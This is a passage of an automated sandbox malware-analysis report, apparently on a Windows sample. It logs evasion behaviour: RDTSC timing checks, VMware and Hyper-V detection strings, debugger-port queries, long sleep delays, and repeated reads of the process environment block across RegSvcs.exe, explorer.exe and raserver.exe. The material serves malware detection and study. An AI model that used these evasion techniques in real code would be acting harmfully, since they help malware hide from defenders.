            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000E098E4 second address: 0000000000E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000E09B5E second address: 0000000000E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe TID: 4120Thread sleep time: -50971s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe TID: 5968Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6520Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6520Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2432Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: explorer.exe, 00000002.00000000.245822763.0000000001398000.00000004.00000020.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000002.00000000.256631003.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: 26700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAK
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000002.00000002.516234509.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000002.00000002.504133649.0000000001398000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C962 mov eax, dword ptr fs:[00000030h]1_2_0165C962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B171 mov eax, dword ptr fs:[00000030h]1_2_0165B171
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B171 mov eax, dword ptr fs:[00000030h]1_2_0165B171
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167B944 mov eax, dword ptr fs:[00000030h]1_2_0167B944
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167B944 mov eax, dword ptr fs:[00000030h]1_2_0167B944
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov ecx, dword ptr fs:[00000030h]1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168513A mov eax, dword ptr fs:[00000030h]1_2_0168513A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168513A mov eax, dword ptr fs:[00000030h]1_2_0168513A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]1_2_01659100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]1_2_01659100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]1_2_01659100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]1_2_0165B1E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]1_2_0165B1E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]1_2_0165B1E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016E41E8 mov eax, dword ptr fs:[00000030h]1_2_016E41E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016861A0 mov eax, dword ptr fs:[00000030h]1_2_016861A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016861A0 mov eax, dword ptr fs:[00000030h]1_2_016861A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D69A6 mov eax, dword ptr fs:[00000030h]1_2_016D69A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]1_2_016D51BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]1_2_016D51BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]1_2_016D51BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]1_2_016D51BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C182 mov eax, dword ptr fs:[00000030h]1_2_0167C182
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A185 mov eax, dword ptr fs:[00000030h]1_2_0168A185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682990 mov eax, dword ptr fs:[00000030h]1_2_01682990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01712073 mov eax, dword ptr fs:[00000030h]1_2_01712073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721074 mov eax, dword ptr fs:[00000030h]1_2_01721074
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01670050 mov eax, dword ptr fs:[00000030h]1_2_01670050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01670050 mov eax, dword ptr fs:[00000030h]1_2_01670050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]1_2_0168002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]1_2_0168002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]1_2_0168002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]1_2_0168002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]1_2_0168002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]1_2_0166B02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]1_2_0166B02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]1_2_0166B02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]1_2_0166B02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01724015 mov eax, dword ptr fs:[00000030h]1_2_01724015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01724015 mov eax, dword ptr fs:[00000030h]1_2_01724015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]1_2_016D7016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]1_2_016D7016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]1_2_016D7016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016558EC mov eax, dword ptr fs:[00000030h]1_2_016558EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]1_2_016EB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov ecx, dword ptr fs:[00000030h]1_2_016EB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]1_2_016EB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]1_2_016EB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]1_2_016EB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]1_2_016EB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016990AF mov eax, dword ptr fs:[00000030h]1_2_016990AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov ecx, dword ptr fs:[00000030h]1_2_0168F0BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov eax, dword ptr fs:[00000030h]1_2_0168F0BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov eax, dword ptr fs:[00000030h]1_2_0168F0BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659080 mov eax, dword ptr fs:[00000030h]1_2_01659080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3884 mov eax, dword ptr fs:[00000030h]1_2_016D3884
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3884 mov eax, dword ptr fs:[00000030h]1_2_016D3884
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165DB60 mov ecx, dword ptr fs:[00000030h]1_2_0165DB60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01683B7A mov eax, dword ptr fs:[00000030h]1_2_01683B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01683B7A mov eax, dword ptr fs:[00000030h]1_2_01683B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165DB40 mov eax, dword ptr fs:[00000030h]1_2_0165DB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728B58 mov eax, dword ptr fs:[00000030h]1_2_01728B58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165F358 mov eax, dword ptr fs:[00000030h]1_2_0165F358
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171131B mov eax, dword ptr fs:[00000030h]1_2_0171131B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]1_2_016803E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]1_2_016803E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]1_2_016803E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]1_2_016803E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]1_2_016803E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]1_2_016803E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167DBE9 mov eax, dword ptr fs:[00000030h]1_2_0167DBE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D53CA mov eax, dword ptr fs:[00000030h]1_2_016D53CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D53CA mov eax, dword ptr fs:[00000030h]1_2_016D53CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]1_2_01684BAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]1_2_01684BAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]1_2_01684BAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01725BA5 mov eax, dword ptr fs:[00000030h]1_2_01725BA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01661B8F mov eax, dword ptr fs:[00000030h]1_2_01661B8F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01661B8F mov eax, dword ptr fs:[00000030h]1_2_01661B8F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170D380 mov ecx, dword ptr fs:[00000030h]1_2_0170D380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168B390 mov eax, dword ptr fs:[00000030h]1_2_0168B390
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171138A mov eax, dword ptr fs:[00000030h]1_2_0171138A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682397 mov eax, dword ptr fs:[00000030h]1_2_01682397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170B260 mov eax, dword ptr fs:[00000030h]1_2_0170B260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170B260 mov eax, dword ptr fs:[00000030h]1_2_0170B260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728A62 mov eax, dword ptr fs:[00000030h]1_2_01728A62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169927A mov eax, dword ptr fs:[00000030h]1_2_0169927A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171EA55 mov eax, dword ptr fs:[00000030h]1_2_0171EA55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]1_2_01659240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]1_2_01659240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]1_2_01659240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]1_2_01659240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016E4257 mov eax, dword ptr fs:[00000030h]1_2_016E4257
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01694A2C mov eax, dword ptr fs:[00000030h]1_2_01694A2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01694A2C mov eax, dword ptr fs:[00000030h]1_2_01694A2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AA16 mov eax, dword ptr fs:[00000030h]1_2_0171AA16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AA16 mov eax, dword ptr fs:[00000030h]1_2_0171AA16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01668A0A mov eax, dword ptr fs:[00000030h]1_2_01668A0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AA16 mov eax, dword ptr fs:[00000030h]1_2_0165AA16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AA16 mov eax, dword ptr fs:[00000030h]1_2_0165AA16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]1_2_01655210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov ecx, dword ptr fs:[00000030h]1_2_01655210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]1_2_01655210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]1_2_01655210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01673A1C mov eax, dword ptr fs:[00000030h]1_2_01673A1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682AE4 mov eax, dword ptr fs:[00000030h]1_2_01682AE4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682ACB mov eax, dword ptr fs:[00000030h]1_2_01682ACB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]1_2_016552A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]1_2_016552A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]1_2_016552A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]1_2_016552A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]1_2_016552A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166AAB0 mov eax, dword ptr fs:[00000030h]1_2_0166AAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166AAB0 mov eax, dword ptr fs:[00000030h]1_2_0166AAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FAB0 mov eax, dword ptr fs:[00000030h]1_2_0168FAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168D294 mov eax, dword ptr fs:[00000030h]1_2_0168D294
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168D294 mov eax, dword ptr fs:[00000030h]1_2_0168D294
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C577 mov eax, dword ptr fs:[00000030h]1_2_0167C577
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C577 mov eax, dword ptr fs:[00000030h]1_2_0167C577
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01693D43 mov eax, dword ptr fs:[00000030h]1_2_01693D43
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3540 mov eax, dword ptr fs:[00000030h]1_2_016D3540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01677D50 mov eax, dword ptr fs:[00000030h]1_2_01677D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728D34 mov eax, dword ptr fs:[00000030h]1_2_01728D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171E539 mov eax, dword ptr fs:[00000030h]1_2_0171E539
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
